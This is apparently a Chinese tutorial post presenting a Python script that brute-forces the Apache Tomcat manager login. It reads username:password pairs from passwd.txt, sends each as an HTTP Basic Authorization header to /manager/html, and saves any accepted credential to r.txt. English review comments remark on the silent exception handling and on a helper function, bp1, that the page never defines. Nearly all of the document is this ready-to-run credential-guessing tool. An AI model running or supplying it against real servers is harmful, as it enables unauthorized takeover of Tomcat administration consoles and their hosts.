1.原理是 Tomcat 管理页面对密码尝试没有次数限制，每次访问依然有所响应，根据返回内容进行判断识别
代码如下:
import requests
import base64
def bp(ip,port):
# Purpose: read credential candidates from passwd.txt (one line per attempt) and send each one as an
# HTTP Basic Authorization header to the Tomcat manager page of the given host; record the first one
# that is answered with HTTP 200 and a body containing 'Tomcat'.
# ip, port: host and port as strings (both are concatenated straight into the URL).
# Returns None. On a hit the line is printed and appended to r.txt in the current directory.
# NOTE(review): the whole body sits in a bare try/except that swallows every exception, so any failure
# (network error, missing passwd.txt, or bp1 not being defined on this page) ends the call silently.
try:
print(ip)
# bp1 is not defined on this page; whatever it does, an error raised here is hidden by the bare except.
bp1(ip,port)
url = 'http://'+ip+':'+port+'/manager/html'
with open("passwd.txt", "r") as f:
while 1:
# Take the next username/password candidate from the dictionary file ([:-1] drops the trailing newline).
passwd = f.readline()[:-1]
# An empty read means end of file: stop.
if passwd == "":
break
# Encode the candidate as an HTTP Basic Authorization value (base64 encoding, not encryption).
Authorization = "Basic " + base64.b64encode(passwd.encode("utf-8")).decode("utf-8")
headers = {
"Authorization": Authorization
}
# One GET per candidate to the same URL, with no delay and no handling of the response status other
# than the check below; on the server side this appears as a run of authentication attempts against
# /manager/html from a single client.
response = requests.get(url, headers=headers)
#print(response.status_code)
# Treat HTTP 200 with 'Tomcat' in the body as an accepted credential.
if response.status_code == 200 and 'Tomcat' in response.text:
#print("success")
print(url+'|' + passwd)
# Append the hit to r.txt; opened without a context manager, so the handle stays open if write() raises.
save=open('r.txt','a+')
save.write(url+'-' + passwd+"\n")
save.close()
break
except:
pass
# Script entry point: the host value is a placeholder on this page; the port is passed as a string
# because bp() concatenates it into the URL.
if __name__ == '__main__':
bp('xxxxxxx','8081')
2.成功后结果会写入 r.txt 文件